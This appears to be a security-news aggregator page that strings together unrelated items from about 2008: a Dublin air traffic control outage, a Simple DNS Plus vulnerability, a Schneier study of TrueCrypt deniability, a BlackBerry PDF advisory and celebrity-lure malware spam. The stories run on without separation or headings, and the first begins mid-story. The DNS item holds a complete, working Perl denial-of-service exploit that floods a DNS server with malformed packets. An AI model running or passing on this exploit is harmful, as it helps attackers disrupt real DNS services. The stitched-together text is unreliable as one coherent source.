The airport was shut on Wednesday after ATC periodically lost plane tracking for up to ten minutes at a time. Flights had to be rerouted across Europe, causing massive delays.

The problem has been traced to a faulty network card that caused the system, built by Thales, to overload.

“Thales ATM confirmed the root cause of the hardware system malfunction as an intermittent malfunctioning network card which consequently overcame the built-in system redundancy,” said the Irish Aviation Authority in a statement.

“Thales ATM also confirmed that the cause of the malfunction was the same for previous malfunctions which had occurred since 2 June, 2008. Thales ATM stated that in ten similar Air Traffic Control Centres worldwide with over 500,000 flight hours (50 years), this is the first time an incident of this type has been reported.”

The radar system had been suffering problems for some time and the airport was allowing fewer planes to take off and land because of fears about the radar system.

By on Wednesday at around 2pm ATC lost all height and location information on flights and ordered aircraft into a holding pattern before dispersing them to other landing spots.

Dublin is Ireland’s busiest airport and the shut down caused serious disruption to passengers, and particularly to Aer Lingus and Ryanair who based many of their services there.

A vulnerability in the way Simple DNS plus handles incoming DNS queries allows a remote attacker to cause the product to fail by sending it a malformed DNS request.

Vulnerable Systems:
* Simple DNS Plus version 5.0
* Simple DNS Plus version 4.1

Exploit:
#!/usr/bin/perl
# Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit
#
# usage: sdns-dos.pl <dns server> <dns source port> <num of packets>
# Exploit written by Exodus.
# http://www.blackhat.org.il

use IO::Socket;

if(@ARGV < 3){
print(”sdns-dos.pl <dns server> <dns source port> <num of packets>”);
}
$sock = IO::Socket::INET->new(PeerAddr => “$ARGV[0]:$ARGV[1]”, Proto => ‘UDP’) || die(”Cant connect DNS server”);

$address = $ARGV[0];

$trans = pack(”H4″,”1337″);
$flags = pack(”B16″,”1000010110110000″);
$question = pack(”H4″,”0001″);
$answerRR = pack(”H4″,”0001″);
$authorityRR = pack(”H4″,”0000″);
$additionlRR = pack(”H4″,”0000″);
$type = pack(”H4″,”0001″); # A host name
$class = pack(”H4″,”0001″); # IN

@parts = split(/\./,$address);
foreach $part (@parts)
{
$packedlen = pack(”H2″,sprintf(”%02x”,length($part)));
$address2 .= $packedlen.$part;
}
$query = $address2. “\000″ . $type . $class;

$aname = pack(”H4″,”c00c”);
$atype = pack(”H4″,”0001″);
$aclass = pack(”H4″,”0001″);
$ttl = pack(”H8″,”0000008d”);
$dlen = pack(”H4″,”0004″);
$addr = inet_aton(”127.0.0.1″);
$answer = $aname . $atype . $aclass . $ttl . $dlen . $addr;

$payload = $trans . $flags . $question . $answerRR
. $authorityRR . $additionlRR . $query . $answer;

print “sending $ARGV[2] packets “;
for($i=0;$i<=$ARGV[2];$i++)
{
print $sock $payload;
}
print “Done. Good bye.”;
__END__

Cryptography expert Bruce Schneier, in conjunction with a research group, has studied the security of TrueCrypt, to see whether it meets the specifications for a ‘Deniable File System’ (DFS) – implemented in TrueCrypt as hidden volumes – and is really able to conceal the existence of a volume within a standard system environment.

Hidden volumes are intended to conceal even the existence of encrypted files. It allows a PC owner to deny having specific encrypted data on his PC. Even where a suspect in a police investigation reveals the key to an outer container in order to avoid a jail term, he or she can still deny the existence of a concealed inner container. This is known as deniable encryption. For the authorities, the only solution to this would be to make the private use of encryption itself illegal.

Whilst TrueCrypt 5.1a itself appears to offer few points of attack, Windows Vista, Word and Google Desktop all undermine the principle of deniability. As soon as a user opens a hidden volume, traces, such as a unique volume ID, are left in the Windows registry. In addition, an edited file may subsequently appear in the list of recently opened documents.

According to Schneier, Word can torpedo both encryption and deniability if auto-save is activated. Using simple Word auto-recovery tools, he succeeded in recovering a Word file edited in a hidden folder. Google Desktop, which indexes many data types as soon as a volume is opened, can have similarly fatal consequences.

Some of these problems have already been addressed in TrueCrypt 6.0. This allows the entire operating system to be hidden in an inner container. Depending on the password entered by the user when booting, either the encrypted system alone or both the encrypted system and the hidden system will start. It is then irrelevant whether or not the operating system or another application leaves traces of the hidden system.

Schneier’s group intend to present their results at USENIX HotSec ‘08 at the end of this month. The seven-page paper is already available as a PDF.

Description:

BlackBerry Attachment Service is a component of BlackBerry Enterprise Server and BlackBerry Unite! that is used to process email attachments.

BlackBerry Enterprise Server provides a wireless connectivity platform for sending and receiving a variety of data from wireless devices such as smartphones.

BlackBerry Unite! is a personal networking application for BlackBerry users.

BlackBerry Attachment Service is prone to a remote code-execution vulnerability that occurs when the PDF distiller component of the service processes specially crafted PDF files.

Attackers can leverage this issue to execute arbitrary machine code in the context of applications running the service. Successful exploits will compromise the server. Failed attacks will likely result in denial-of-service conditions.

This issue affects the following:

BlackBerry Enterprise Server 4.1.3 through 4.1.5
BlackBerry Unite! prior to 1.0.1 bundle 36.

Affected Products:

• BlackBerry Enterprise Server 4.1.3
• BlackBerry Enterprise Server 4.1.4
• BlackBerry Enterprise Server 4.1.5
• BlackBerry Unite! 1.0.1

References:

• BlackBerry: Vendor Homepage
• BlackBerry: Vulnerability in the PDF distiller of the BlackBerry Attachment Service for Blac
• BlackBerry: Vulnerability in the PDF distiller of the BlackBerry Attachment Service for the

Antivirus experts have warned of a new wave of spam messages that use fake events related to Angelina Jolie in order to trick users into downloading and installing malware.

Researchers at Romanian firm BitDefender said that this latest campaign is mostly carried via spam messages based around alleged adult video footage of the movie star.

In order to watch the ‘movie’, users have to download a file called ‘video-nude-anjelina.avi.exe’ which is infected with Trojan.Agent.AGGZ.

The spam message comprises an explicit image of Jolie, along with text claiming that the email has been sent as part of the MSN Featured Offers programme.

The message attempts to play a double role by trying to trick the user into thinking that this is a legitimate news message and by preventing spam filters from labelling the entire email as spam.

“The spam wave is part of a larger category of unsolicited messages that rely on social engineering techniques in order to lure unwary users into installing Trojans,” said Vlad Valceanu, head of BitDefender anti-spam research.

“This type of attack seems to be extremely successful, as the number of messages has quickly escalated over the last couple months.

“In order to achieve their goals, spammers usually rely on international celebrities and their pictures, along with catchy yet fake news leads.”

This is not the only incident involving Jolie. The actress recently gave birth to two children, and spammers took advantage of the event in order to infect more computers.

The spam campaign following the event announced that Jolie gave birth to no fewer than five children, and even offered users a link to a website allegedly hosting a small video of the event.

Once on the respective page, users were shown an image masquerading as a Flash video player.

But when the user landed on the compromised webpage, the download started immediately without any user intervention - a procedure also known as drive-by download.

The binary file was infected with Trojan.Downloader.Exchanger.Gen.1, a piece of malware that has been widely used in another spam campaign promoting an alleged antivirus utility called Antivirus XP 2008.